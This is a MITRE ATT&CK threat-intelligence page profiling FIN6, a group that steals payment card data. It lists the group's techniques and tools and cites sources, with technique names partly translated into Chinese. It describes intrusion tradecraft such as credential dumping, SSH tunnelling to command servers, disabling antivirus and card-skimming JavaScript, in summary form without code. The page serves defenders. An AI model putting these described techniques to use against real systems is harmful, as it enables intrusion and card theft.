1. Home
  2. Groups
  3. FIN6

FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.[1][2]

ID: G0037
Associated Groups: Magecart Group 6, ITG08, Skeleton Spider, TAAL, Camouflage Tempest
Contributors: Center for Threat-Informed Defense (CTID); Drew Church, Splunk
Version: 4.0
Created: 31 May 2017
Last Modified: 17 November 2024

Associated Group Descriptions

Name Description
Magecart Group 6

[3]
ITG08

[4]
Skeleton Spider

[5]
TAAL

[6]
Camouflage Tempest

[6]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

FIN6 has used WMI to automate the remote execution of PowerShell scripts.[4]

Enterprise T1213 从信息存储库获取数据

FIN6 has collected schemas and user accounts from systems running SQL Server.[7]
Enterprise T1555 从密码存储中获取凭证

FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.[7]
.003 Credentials from Web Browsers

FIN6 has used the Stealer One credential stealer to target web browsers.[7]
Enterprise T1005 从本地系统获取数据

FIN6 has collected and exfiltrated payment card data from compromised systems.[8][9][10]
Enterprise T1036 .004 伪装: Masquerade Task or Service

FIN6 has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.[2]

Enterprise T1573 .002 加密通道: Asymmetric Cryptography

FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]
Enterprise T1572 协议隧道

FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.[1]
Enterprise T1059 命令与脚本解释器

FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[1][2]
.001 PowerShell

FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.[1][2][7]
.003 Windows Command Shell

FIN6 has used kill.bat script to disable security tools.[2]
.007 JavaScript

FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.[8]
Enterprise T1562 .001 妨碍防御: Disable or Modify Tools

FIN6 has deployed a utility script named kill.bat to disable anti-virus.[2]
Enterprise T1560 归档收集数据

Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.[1]
.003 Archive via Custom Method

FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.[1][8]
Enterprise T1003 .001 操作系统凭证转储: LSASS Memory

FIN6 has used Windows Credential Editor for credential dumping.[1][2]

.003 操作系统凭证转储: NTDS

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1][2]

Enterprise T1074 .002 数据分段: Remote Data Staging

FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.[1]
Enterprise T1110 .002 暴力破解: Password Cracking

FIN6 has extracted password hashes from ntds.dit to crack offline.[1]
Enterprise T1048 .003 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol

FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.[8]
Enterprise T1078 有效账户

To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.[1][2][7]
Enterprise T1068 权限提升漏洞利用

FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.[1]
Enterprise T1027 .010 混淆文件或信息: Command Obfuscation

FIN6 has used encoded PowerShell commands.[7]
Enterprise T1204 .002 用户执行: Malicious File

FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.[7]
Enterprise T1070 .004 移除指标: File Deletion

FIN6 has removed files from victim machines.[1]
Enterprise T1569 .002 系统服务: Service Execution

FIN6 has created Windows services to execute encoded PowerShell commands.[2]
Enterprise T1102 网络服务

FIN6 has used Pastebin and Google Storage to host content for their operations.[2]

Enterprise T1046 网络服务发现

FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]
Enterprise T1119 自动化收集

FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.[1][8]
Enterprise T1588 .002 获取能力: Tool

FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.[4][2]
Enterprise T1134 访问令牌操控

FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.[2]
Enterprise T1087 .002 账号发现: Domain Account

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1]
Enterprise T1021 .001 远程服务: Remote Desktop Protocol

FIN6 used RDP to move laterally in victim networks.[1][2]
Enterprise T1018 远程系统发现

FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

FIN6 has targeted victims with e-mails containing malicious attachments.[7]
.003 钓鱼: Spearphishing via Service

FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.[4]
Enterprise T1095 非应用层协议

FIN6 has used Metasploit Bind and Reverse TCP stagers.[8]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.[1]
Enterprise T1553 .002 颠覆信任控制: Code Signing

FIN6 has used Comodo code-signing certificates.[4]

Software

ID Name References Techniques
S0552 AdFind [2] 域信任发现, 权限组发现: Domain Groups, 系统网络配置发现, 账号发现: Domain Account, 远程系统发现
S0154 Cobalt Strike [2] BITS任务, Windows管理规范, 从本地系统获取数据, 代理: Domain Fronting, 代理: Internal Proxy, 使用备用认证材料: Pass the Hash, 修改注册表, 创建或修改系统进程: Windows Service, 办公应用启动: Office Template Macros, 加密通道: Asymmetric Cryptography, 加密通道: Symmetric Cryptography, 协议隧道, 反射性代码加载, 反混淆/解码文件或信息, 命令与脚本解释器: JavaScript, 命令与脚本解释器: Visual Basic, 命令与脚本解释器: PowerShell, 命令与脚本解释器: Python, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify Tools, 客户端执行漏洞利用, 屏幕捕获, 应用层协议: DNS, 应用层协议: Web Protocols, 应用层协议: File Transfer Protocols, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: Security Account Manager, 数据传输大小限制, 数据混淆: Protocol or Service Impersonation, 数据编码: Standard Encoding, 文件和目录发现, 有效账户: Domain Accounts, 有效账户: Local Accounts, 本机API, 权限提升漏洞利用, 权限组发现: Domain Groups, 权限组发现: Local Groups, 查询注册表, 浏览器会话劫持, 混淆文件或信息: Indicator Removal from Tools, 混淆文件或信息, 滥用权限提升控制机制: Sudo and Sudo Caching, 滥用权限提升控制机制: Bypass User Account Control, 移除指标: Timestomp, 系统二进制代理执行: Rundll32, 系统服务: Service Execution, 系统服务发现, 系统网络连接发现, 系统网络配置发现, 网络共享发现, 网络服务发现, 访问令牌操控: Parent PID Spoofing, 访问令牌操控: Token Impersonation/Theft, 访问令牌操控: Make and Impersonate Token, 账号发现: Domain Account, 软件发现, 输入工具传输, 输入捕获: Keylogging, 进程发现, 进程注入: Dynamic-link Library Injection, 进程注入: Process Hollowing, 进程注入, 远程服务: Remote Desktop Protocol, 远程服务: SSH, 远程服务: Windows Remote Management, 远程服务: SMB/Windows Admin Shares, 远程服务: Distributed Component Object Model, 远程系统发现, 隐藏伪装: Process Argument Spoofing, 非应用层协议, 预定传输, 颠覆信任控制: Code Signing
S0381 FlawedAmmyy [7] Windows管理规范, 从本地系统获取数据, 剪贴板数据, 加密通道: Symmetric Cryptography, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 命令与脚本解释器: PowerShell, 外围设备发现, 屏幕捕获, 应用层协议: Web Protocols, 数据混淆, 权限组发现: Local Groups, 移除指标: File Deletion, 系统二进制代理执行: Rundll32, 系统二进制代理执行: Msiexec, 系统信息发现, 系统所有者/用户发现, 软件发现: Security Software Discovery, 输入工具传输, 输入捕获: Keylogging, 输入捕获, 通过C2信道渗出
S0503 FrameworkPOS [11][5][7] 从本地系统获取数据, 归档收集数据: Archive via Custom Method, 数据分段: Local Data Staging, 替代协议渗出, 进程发现
S0632 GrimAgent [12] 从本地系统获取数据, 加密通道: Asymmetric Cryptography, 加密通道: Symmetric Cryptography, 反混淆/解码文件或信息, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 执行保护: Mutual Exclusion, 数据混淆: Junk Data, 数据编码: Standard Encoding, 文件和目录发现, 本机API, 混淆文件或信息, 混淆文件或信息: Binary Padding, 移除指标: Clear Persistence, 移除指标: File Deletion, 系统位置发现: System Language Discovery, 系统位置发现, 系统信息发现, 系统所有者/用户发现, 系统网络配置发现, 虚拟化/沙盒规避: Time Based Evasion, 输入工具传输, 通过C2信道渗出, 预定任务/作业: Scheduled Task
S0372 LockerGoga [2] Loss of Control, Loss of Productivity and Revenue, Loss of View, 妨碍防御: Disable or Modify Tools, 数据加密以实现影响, 横向工具传输, 移除指标: File Deletion, 系统关机/重启, 账号访问移除, 颠覆信任控制: Code Signing
S0449 Maze [13] Windows管理规范, 伪装: Masquerade Task or Service, 动态解析, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify Tools, 应用层协议: Web Protocols, 数据加密以实现影响, 服务停止, 本机API, 混淆文件或信息: Binary Padding, 混淆文件或信息, 移除指标, 系统二进制代理执行: Msiexec, 系统位置发现: System Language Discovery, 系统信息发现, 系统关机/重启, 系统恢复抑制, 系统网络连接发现, 进程发现, 进程注入: Dynamic-link Library Injection, 隐藏伪装: Run Virtual Instance, 预定任务/作业: Scheduled Task
S0002 Mimikatz [4] 从密码存储中获取凭证, 从密码存储中获取凭证: Credentials from Web Browsers, 从密码存储中获取凭证: Windows Credential Manager, 伪造域控制器, 使用备用认证材料: Pass the Hash, 使用备用认证材料: Pass the Ticket, 启动或登录自动启动执行: Security Support Provider, 操作系统凭证转储: DCSync, 操作系统凭证转储: Security Account Manager, 操作系统凭证转储: LSASS Memory, 操作系统凭证转储: LSA Secrets, 未加密凭证: Private Keys, 窃取或伪造Kerberos票据: Golden Ticket, 窃取或伪造Kerberos票据: Silver Ticket, 窃取或伪造身份认证证书, 访问令牌操控: SID-History Injection, 账号操控
S0284 More_eggs [4][7] 加密通道: Symmetric Cryptography, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 应用层协议: Web Protocols, 数据编码: Standard Encoding, 混淆文件或信息: Encrypted/Encoded File, 移除指标: File Deletion, 系统二进制代理执行: Regsvr32, 系统信息发现, 系统所有者/用户发现, 系统网络配置发现: Internet Connection Discovery, 系统网络配置发现, 软件发现: Security Software Discovery, 输入工具传输, 颠覆信任控制: Code Signing
S0029 PsExec [1][2] 创建或修改系统进程: Windows Service, 创建账户: Domain Account, 横向工具传输, 系统服务: Service Execution, 远程服务: SMB/Windows Admin Shares
S0446 Ryuk [2] Loss of Productivity and Revenue, 伪装: Match Legitimate Name or Location, 伪装, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 妨碍防御: Disable or Modify Tools, 数据加密以实现影响, 文件和目录发现, 文件和目录权限修改: Windows File and Directory Permissions Modification, 有效账户: Domain Accounts, 服务停止, 本机API, 流量激活, 混淆文件或信息, 系统位置发现: System Language Discovery, 系统信息发现, 系统恢复抑制, 系统网络配置发现, 访问令牌操控, 进程发现, 进程注入, 远程服务: SMB/Windows Admin Shares, 预定任务/作业: Scheduled Task
S0005 Windows Credential Editor [1] 操作系统凭证转储: LSASS Memory

References

  1. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024.
  2. McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
  3. Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.
  4. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
  5. CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
  6. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  7. Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.
  1. Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.
  2. Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.
  3. Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.
  4. Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.
  5. Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved September 19, 2024.
  6. Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.